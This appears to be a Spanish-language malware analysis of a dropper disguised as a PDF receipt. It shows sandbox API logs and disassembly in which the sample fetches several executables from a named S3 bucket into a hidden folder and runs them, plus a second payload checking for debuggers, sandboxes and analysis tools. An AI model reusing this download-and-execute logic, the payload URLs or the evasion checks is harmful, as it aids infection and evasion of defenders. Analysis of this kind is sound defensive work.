OpenMutex(Local\c:!documents and settings!r32!configuración local!archivos temporales de internet!content.ie5!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\c:!documents and settings!r32!configuración local!archivos temporales de internet!content.ie5!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateFile(C:\Documents and Settings\r32\Configuración local\Archivos temporales de Internet\Content.IE5\index.dat) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\c:!documents and settings!r32!cookies!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\c:!documents and settings!r32!cookies!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateFile(C:\Documents and Settings\r32\Cookies\index.dat) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\c:!documents and settings!r32!configuración local!historial!history.ie5!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\c:!documents and settings!r32!configuración local!historial!history.ie5!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateFile(C:\Documents and Settings\r32\Configuración local\Historial\History.IE5\index.dat) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\WininetStartupMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(ws2_32) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(ws2_32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(ws2help.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(shlwapi.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\WininetConnectionMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\WininetProxyRegistryMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
InternetGetConnectedState() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(rasapi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateEvent(DINPUTWINMM) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(rasman.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(netapi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(tapi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(rtutils.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(winmm.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(RasPbFile) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(RasPbFile) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
RasEnumEntries() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\RASAPI32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenSCManager((null),(null)) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenService(RASMAN) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(userenv.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
lstrcmpi(WinNT,WinNT) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateEvent(Global\userenv:  User Profile setup event) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(msapsspc.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
lstrcmpi(COMPUTERNAME,TEMP) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
lstrcmpi(COMPUTERNAME,TMP) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(msvcrt40.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\msapsspc.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(schannel.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(crypt32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(msasn1.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\ADVAPI32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateEvent(Global\crypt32LogoffEvent) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\schannel.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\kernel32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(digest.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\digest.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(msnsspc.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\msnsspc.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\msv1_0.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(cryptdll.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(iphlpapi.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\WININET.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenService(Sens) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(sensapi.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
InternetOpen() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
InternetConnect(s3-sa-east-1.amazonaws.com) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\mswsock.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/banolo99/jjca.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(hnetcfg.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\wshtcpip.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\USERENV.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(ws2_32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
bind(port=0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
connect( 127.0.0.1:2673 ) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(wintrust.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(imagehlp.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\wintrust.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(schannel) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(crypt32) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\ZonesCounterMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\ZoneAttributeCacheCounterMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\ZonesCacheCounterMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\ZonesLockedCacheCounterMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(ole32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpSendRequest() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(rasadhlp.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
connect( 127.0.0.1:9666 ) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/Projeto.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/banolo99/Projeto.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateProcess((null),C:\wina\Projeto.exe,(null)) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/jsobs.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/banolo99/jsobs.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/jsob.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/banolo99/jsob.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/trusted.certs) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/banolo99/trusted.certs) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
ExitProcess(0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\rasman.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\rtutils.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(EXPLORER.EXE) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\WINDOWS\system32\Msctf.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(BSA.EXE) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(dumpcap.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(RegWatcher.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(arwwdwin.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(XueTr.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(notepad.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\Documents and Settings\r32\Mis documentos\Descargas\Comprovante\Comprovante.pdf2.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\msv1_0.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\IMM32.DLL) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]

En la raiz del disco crea una carpeta oculta y de sistema "wina" donde se alojarán los archivos descargados:

Código:
CODE:0045404B                 push    0
CODE:0045404D                 push    0
CODE:0045404F                 push    offset aCWinaJjca_dll ; "C:\\wina\\jjca.dll"
CODE:00454054                 push    offset aHttpsS3SaEast1 ; "https://s3-sa-east-1.amazonaws.com/bano"...
CODE:00454059                 push    0
CODE:0045405B                 call    URLDownloadToFileA
CODE:00454060                 push    0
CODE:00454062                 push    0
CODE:00454064                 push    offset aCWinaProjeto_e ; "C:\\wina\\Projeto.exe"
CODE:00454069                 push    offset aHttpsS3SaEas_0 ; "https://s3-sa-east-1.amazonaws.com/bano"...
CODE:0045406E                 push    0
CODE:00454070                 call    URLDownloadToFileA
CODE:00454075                 push    5
CODE:00454077                 push    offset aCWinaProjeto_e ; "C:\\wina\\Projeto.exe"
CODE:0045407C                 call    WinExec
CODE:00454081                 push    0
CODE:00454083                 push    0
CODE:00454085                 push    offset aCWinaJsobs_exe ; "C:\\wina\\jsobs.exe"
CODE:0045408A                 push    offset aHttpsS3SaEas_1 ; "https://s3-sa-east-1.amazonaws.com/bano"...
CODE:0045408F                 push    0
CODE:00454091                 call    URLDownloadToFileA
CODE:00454096                 push    0
CODE:00454098                 push    0
CODE:0045409A                 push    offset aCWinaJsob_exe ; "C:\\wina\\jsob.exe"
CODE:0045409F                 push    offset aHttpsS3SaEas_2 ; "https://s3-sa-east-1.amazonaws.com/bano"...
CODE:004540A4                 push    0
CODE:004540A6                 call    URLDownloadToFileA
CODE:004540AB                 push    5
CODE:004540AD                 push    offset aCWinaJsob_exe ; "C:\\wina\\jsob.exe"
CODE:004540B2                 call    WinExec
CODE:004540B7                 push    0
CODE:004540B9                 push    0
CODE:004540BB                 lea     edx, [ebp-4]
CODE:004540BE                 mov     eax, offset _str_LOCALAPPDATA.Text
CODE:004540C3                 call    @Sysutils@GetEnvironmentVariable$qqrx17System@AnsiString ; Sysutils::GetEnvironmentVariable(System::AnsiString)
CODE:004540C8                 lea     eax, [ebp-4]
CODE:004540CB                 mov     edx, offset _str_Low_Sun_Java_De.Text
CODE:004540D0                 call    @System@@LStrCat$qqrv ; System::__linkproc__ LStrCat(void)
CODE:004540D5                 mov     eax, [ebp-4]
CODE:004540D8                 call    @System@@LStrToPChar$qqrx17System@AnsiString ; System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:004540DD                 push    eax
CODE:004540DE                 push    offset aHttpsS3SaEas_3 ; "https://s3-sa-east-1.amazonaws.com/bano"...
CODE:004540E3                 push    0
CODE:004540E5                 call    URLDownloadToFileA
CODE:004540EA                 mov     eax, ds:off_456734
CODE:004540EF                 mov     eax, [eax]
CODE:004540F1                 call    @Forms@TApplication@Terminate$qqrv ; Forms::TApplication::Terminate(void)
CODE:004540F6                 xor     eax, eax
CODE:004540F8                 pop     edx
CODE:004540F9                 pop     ecx
CODE:004540FA                 pop     ecx
CODE:004540FB                 mov     fs:[eax], edx
CODE:004540FE                 jmp     short loc_45410A

Descarga de archivos y del certificado:





Archivos creados y conexión con URL:



Petición de archivo "sistema.html" no encontrado en el server:



Análisis del archivo "jsob.exe":
Código:
Code:
Executing: c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe
LoadLibrary(oleaut32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(msvcrt.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(ole32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(advapi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(user32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(kernel32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(msimg32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(gdi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(version.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(shlwapi.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(winspool.drv) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(kernel32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
VirtualQueryEx(c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(Kernel32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcessToken(C:\Documents and Settings\r32\Escritorio\Infect3d\Comprovante\jsob.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(oleaut32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(USER32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(imm32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(c:\windows\system32\uxtheme.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
IsDebuggerPresent() [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
FreeLibrary(C:\WINDOWS\system32\uxtheme.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
BitBlt() [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,92) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(version.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
FreeLibrary() [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenMutex(ShimCacheMutex) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(c:\windows\system32\msctfime.ime) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(C:\Documents and Settings\r32\Escritorio\Infect3d\Comprovante\jsob.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(user32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(security.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETWORKAREA,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(ole32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
FreeLibrary(C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SetTimer(9078c) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SetTimer(607a0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SetTimer(6079c) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SetTimer(c07e4) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(ws2_32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(ws2help.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(fwpuclnt.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETFONTSMOOTHINGTYPE,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetForegroundWindow() [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(C:\WINDOWS\system32\Msimtf.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SetTimer(c076e) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
FindWindow(Shell_TrayWnd,(null)) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(MSCTF.Shared.MUTEX.IKG) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(ctfmon.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(u1210.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(SbieCtrl.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(wireshark.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(sniff_hit.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(VBoxTray.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(procexp.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(BSA.EXE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(dumpcap.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(jsobs.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(PE Explorer (portable).exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(idag.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(notepad.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(EvO_DBG.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateToolhelp32Snapshot(TH32C2_SNAPPROCESS,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
QuerySystemInformation() [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(System,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(smss.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(csrss.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(winlogon.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(services.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(lsass.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(VBoxService.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(svchost.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(SbieSvc.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(explorer.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(VBoxTray.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(ctfmon.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(alg.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(idag.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(PE Explorer (portable).exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(notepad.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(EvO_DBG.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(Comprovante.pdf2.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(sniff_hit.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(jsob.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(procexp.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(Projeto.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(jsobs.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(u1210.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(BSA.EXE,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(SbieCtrl.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(wireshark.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(dumpcap.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
